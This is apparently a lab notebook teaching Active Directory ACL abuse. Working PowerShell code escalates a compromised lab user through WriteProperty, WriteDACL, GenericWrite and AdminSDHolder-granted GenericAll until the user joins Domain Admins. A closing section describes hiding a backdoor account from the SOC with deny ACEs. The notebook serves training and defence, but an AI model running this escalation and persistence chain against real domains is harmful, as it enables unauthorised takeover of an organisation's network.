# ACL Overview
In the Windows operating system, everything is an object - that is, everything is represented by data structures in memory, that contain members that describe the nature of the data the structure is meant to represent. Obvious things such as files and registry keys are objects, but also more abstract things such as processes and threads are also objects.

Active Directory is no different - AD is primarily a database of objects that represent the various identities and relationships in a Windows network. Each object in an AD environment is a user, a group, a computer, a printer, a service account, or even a container for any of these.

Again, as in the Windows operating system, Active Directory objects themselves control who has access to them via _Access Control Lists_, or ACLs (specifically the **D**iscretionary **A**ccess **C**ontrol List or DACL), with each Access Control Entry (or ACE) in the ACL specifying an identity and the specific access rights that identity can excise on the object.

Access rights are incredibly powerful - the demonstration below is not exhaustive, but it will be become apparent how destructive a misconfiured ACE on the wrong object can be. Notably however, many of the attacks that are enabled by misconfigured access rights are detailed in their own notebooks, making understanding what objects have rights over other objects one of the fundamental tasks in reconaissance, and in understanding numerous other attack paths through an AD environment.  

This lab however will focus on an attack path that relies entirely on misconfigured ACLs. While this is a contrived example, it will demonstrate how these attacks paths work, and lay important foundations for other labs. If you skip any lab, do not skip this one.

For this lab, we will assume we have access to the account of a user called "John Dee" by some initial access technique.

In [ ]:
function Search-Directory {
    param (
        [String]$filter,
        [Switch]$all
    )

    # we are hardcoding a lot of stuff here including creds, which is... bad
    $dirEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://dc01.aclabuse.lab", "aclabuse.lab\john.dee", "johnsPass01")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($dirEntry)
    $searcher.Filter = $filter

    # SACL part of security descriptor can only be read by a domain admin, so explicitly request the DACL only
    $searcher.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl

    try {
        if($all) {
            $results = $searcher.FindAll()
            $results | Foreach-Object { $_ }
            $results.Dispose()
        } else {
            $searcher.FindOne()
        }
    } finally {
        $dirEntry.Dispose()
    }
}

Search-Directory -Filter "(ObjectCategory=*)"

Looks like the creds work. The above .NET type `DirectoryEntry` retrieves an entry in the AD directory as the name suggests. We are using the [ADSI interface](https://learn.microsoft.com/en-us/windows/win32/adsi/using-adsi) for these calls. The `DirectoryEntry` object for the domain is [being constructed](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.directoryentry.-ctor?view=net-8.0#system-directoryservices-directoryentry-ctor(system-string-system-string-system-string-system-directoryservices-authenticationtypes)) using the path to the _RootDSE_, which is the Root object of the entire Directory. The RootDSE sits on a directory server, so we supply it wih the FQDN of the domain controller (the directory server for this lab).

We then construct a `DirectorySearcher` object - think of it as a pointer or cursor which we use to traverse the directory and look for objects.

Lets examine the account we have creds for in more detail, by setting the _filter_ on the searcher. This uses LDAP filter syntax, which is somewhat idiosyncratic. As you can see below, looks like John is in the group __Office Admins__. Maybe an HR function of some kind? 

In [ ]:
$userSearchResult = Search-Directory -Filter "(&(objectCategory=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

Lets examine the properties of the Office Admins group briefly. We set the filter to look for the Office Admins group, retrieve a `SearchResult` object and print the properties of the object, which will have been filled with the properties of the AD object we searched for.

In [ ]:
$officeAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Office Admins))"

"CN: $($officeAdminsSearchResult.Properties.cn)"
"DN: $($officeAdminsSearchResult.Properties.distinguishedname)"
"Members: $($officeAdminsSearchResult.Properties.member)"
"SID: $($officeAdminsSearchResult.Properties.objectsid)"

We can see the members only include John (this is a contrived lab after all). Notice that the SID of the group is in a binary format however. We need the SID for the next step, so we will construct a `SecurityIdentifier` object out of this binary value, in order to convert it to the more recognisable form.

In [ ]:
$officeAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$officeAdminsSearchResult.Properties.objectsid[0],0))
$officeAdminsSID.Value

Now for some actual recon. Lets look at what other groups the Office Admins group has rights on. As before we set the LDAP filter, this time to look for any groups with _admin_ in the name. Then, we iterate through the groups, examining the ACLs for the group as we go and highlighting any ACEs that contain the SID of the Office Admins group. This will give us a list of objects in the domain that members of the Office Admins group have permissions over. 

We will do this multiple times in the lab, so we will wrap this large chunk of code into a convenience function. If we wanted to scale this or use it outside this lab we would need to refactor it considerably, but it works well enough for this demonstration.

In [ ]:
function scout-adminACL {
    param (
        [String]$targetSID
    )

    Write-Host "Checking which admin groups $targetSID has rights on..."
    $groups = $(Search-Directory -Filter "(&(objectCategory=group)(cn=*admin*))" -All) 
    foreach ($group in $groups) {
        
        # Get the common name of the group
        $groupName = $group.Properties["cn"][0]

        # Get the ACL from the binary nTSecurityDescriptor property
        $groupSecurityDescriptor = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $groupSecurityDescriptor.SetSecurityDescriptorBinaryForm([Byte[]]$group.Properties["nTSecurityDescriptor"][0])
        $groupACL = $groupSecurityDescriptor.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        
        foreach ($ace in $groupACL) {
            if ($ace.IdentityReference.CompareTo($targetSID) -eq 0) {
                Write-Host "$($ace.AccessControlType) -> $($ace.ActiveDirectoryRights) on '$groupName'"
            }
        }
    }
}

scout-adminACL -targetSID $officeAdminsSID.Value


Bingo. But what can we do with this right?

## WriteProperty
This right, as the name implies, grants a principal the capability to modify properties on another object. If we had `WriteProperty` on the _Domain Admins_ group, we could simply modify the _members_ property and add ourselves to that group, for example. Not so lucky this time, but we do have this right over the _DevOps Admins_ group. We will use this to add our compromised user to the _DevOps Admins_ group.

Using the searcher we find the group object and call the `GetDirectoryEntry` method to retrieve the Directory entry itself - we will need this to actually make changes to the object as it exists in the directory.

In [ ]:
$devOpsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"
"Group Name: $($devopsAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($devopsAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $path = $devopsAdminsSearchResult.Path
    $devOpsAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($path, "aclabuse.lab\john.dee", "johnsPass01")
    $devopsAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
    $devopsAdminsEntry.RefreshCache()
} finally {
    $devopsAdminsEntry.Dispose()
}

$devOpsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"
"`nNew Members:"
foreach ($member in $($devopsAdminsSearchResult.Properties.member)) {
    "    $member"
}

By turning the searcher back to the compromised account we can see the `MemberOf` property has been updated and reflects the new group membership.

In [ ]:
$userSearchResult = Search-Directory -Filter "(&(objectClass=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

## WriteDACL
WriteDACL is self descriptive - it allows for a principal to modify the DACL of an object.

In [ ]:
$devopsAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=DevOps Admins))"
$devopsAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$devopsAdminsSearchResult.Properties.objectsid[0],0))
scout-adminACL -targetSID $devopsAdminsSID.value

Lets use the WriteDACL write to add an entry to the ACL on the IT Admins group object which lets us modify the group. We could add WriteProperty and use this as before to modify group membership, but lets try a more permissive right: GenericWrite.

We will first construct an ACE using our compromised users SID, the AD right we want (GenericWrite), the control type of allow, and with inheritence disabled. 

In [ ]:
$userSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$userSearchResult.Properties.objectsid[0],0))
$newAce = (New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
                ([System.Security.Principal.IdentityReference]([System.Security.Principal.SecurityIdentifier]$userSID)), 
                ([System.DirectoryServices.ActiveDirectoryRights]'GenericWrite'),
                ([System.Security.AccessControl.AccessControlType]'Allow'),
                ([System.DirectoryServices.ActiveDirectorySecurityInheritance]'None'))
            )
$newAce | Select *

In [ ]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"

try {
    $path = "LDAP://dc01.aclabuse.lab/$($ITAdminsSearchResult.Properties.distinguishedname)"
    $ITAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($path, "aclabuse.lab\john.dee", "johnsPass01")
    $ITAdminsEntry.psbase.Options.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
    $ITAdminsEntry.psbase.ObjectSecurity.AddAccessRule($newAce)
    $ITAdminsEntry.psbase.CommitChanges()
} finally {
    $ITAdminsEntry.Dispose()
}

## GenericWrite

Now using GenericWrite we can add our compromised user to the IT Admins group.

In [ ]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"
"Group Name: $($ITAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($ITAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $path = $ITAdminsSearchResult.Path
    $ITAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($path, "aclabuse.lab\john.dee", "johnsPass01")
    $ITAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
    $ITAdminsEntry.RefreshCache()
} finally {
    $ITAdminsEntry.Dispose()
}

$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=IT Admins))"
"Current Members:"
foreach ($member in $($ITAdminsSearchResult.Properties.member)){
    "    $member"
}

And as before this should be reflected in the users directory entry.

In [ ]:
$userSearchResult = Search-Directory -Filter "(&(objectClass=user)(samAccountName=john.dee))"

"DN: $($userSearchResult.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userSearchResult.Properties.memberof)) {
    "    $group"
}

Lets examine what rights the IT Admins group has and on what objects in the domain.

In [ ]:
$ITAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(objectClass=group)(cn=IT Admins))"
$ITAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$ITAdminsSearchResult.Properties.objectsid[0],0))
scout-adminACL -targetSID $ITAdminsSID.value

Blimey. Thats bad. Looks like IT Admins has permissions on all privileged groups. So what is granting these rights?

## GenericAll and AdminSDHolder
GenericAll means just that - any and all actions are permitted on the target object for the principle granted the right. How this right was applied to so many privileged groups is down to a template object known as AdminSDHolder.

AdminSDHolder is an object that holds the DACL for all privileged objects in the domain. Every 60 minutes or so, a process called SDProp will run and apply whatever DACL is on AdminSDHolder to the privileged groups, overwriting any other DACL that those objects may have. This is a security control, as any misconfigurations to the DACL of these privileged groups could lead to compromise as we have already seen. This is unfortunately a double edged sword, and if permissions on the AdminSDHolder object are not careful controlled then it instead becomes a pathway for an attacker.

As we can see below the IT Admins group was at some point granted GenericAll on the AdminSDHolder object, likely for troubleshooting, and has retained this right, meaning it has propagated out to all the privileged groups in the domain.

In [ ]:
$AdminSDPath = (Search-Directory -Filter  "(cn=AdminSDHolder)").Path

try {
    $adminSDEntry = New-Object System.DirectoryServices.DirectoryEntry(
                        $AdminSDPath, 
                        "aclabuse.lab\john.dee", 
                        "johnsPass01"
                    )

    ForEach ($ACE in $adminSDEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ACE.IdentityReference.CompareTo($ITAdminsSID) -eq 0) {
            $ACE
        }
    }
} finally {
    $adminSDEntry.Dispose()
}

GenericAll gives us free reign over the objects it is applied to, so its a simple matter now of adding our compromised account to the domain admins group and establishing domain dominance.

In [ ]:
$domainAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Domain Admins))"
"Group Name: $($domainAdminsSearchResult.Properties.name)"
"Original Members:"
foreach ($member in $($domainAdminsSearchResult.Properties.member)){
    "    $member"
}

try {
    $path = $domainAdminsSearchResult.Path
    $domainAdminsEntry = New-Object System.DirectoryServices.DirectoryEntry($path, "aclabuse.lab\john.dee", "johnsPass01")
    $domainAdminsEntry.Add("LDAP://CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab")
    $domainAdminsEntry.RefreshCache()
} finally {
    $domainAdminsEntry.Dispose()


$domainAdminsSearchResult = Search-Directory -Filter "(&(objectCategory=group)(cn=Domain Admins))"
"`nCurrent Members:"
foreach ($member in $($domainAdminsSearchResult.Properties.member)){
    "    $member"
}

In [ ]:
$credential = New-Object PSCredential("aclabuse\john.dee", $(ConvertTo-SecureString "johnsPass01" -AsPlainText -Force))
Invoke-Command -ComputerName "dc01.aclabuse.lab" -Credential $credential -ScriptBlock {
   whoami.exe /all
 }


## Persistence
Now a member of the Domain Admins group, the attacker creates a backdoor account and sets several DENY ACEs on the account in order to blind the SOC to its existence.

First the attacker creates a container for the account, and explicitly denys the SOC group the RIGHT_DS_LIST_CONTENTS right on it.

Then the attacker creates a highly priviled account named backdoor, and denies the SOC group the RIGHT_DS_LIST_OBJECT right on it.

As you can see, when authenticating as the SOC user Jane.Doe, the object is not listed.

## Last Words
Although a lot of manual recon was performed in this notebook, the entire attack path is viewable, in a much more digestible format, via bloodhound:

![aclabuse_attack_path](./Images/aclabuse.png) 

Interestingly, in its earlier versions bloodhound internally used the ADSI pattern used in this notebook; [it has since switched to a different method](https://blog.cptjesus.com/posts/sharphoundtechnical/#pure-ldap). 

# Further Reading
[An Ace Up the Sleeve: Designing Active Directory DACL Backdoors](https://specterops.io/wp-content/uploads/sites/3/2022/06/an_ace_up_the_sleeve.pdf)

https://learn.microsoft.com/en-us/windows/win32/ad/security-contexts-and-active-directory-domain-services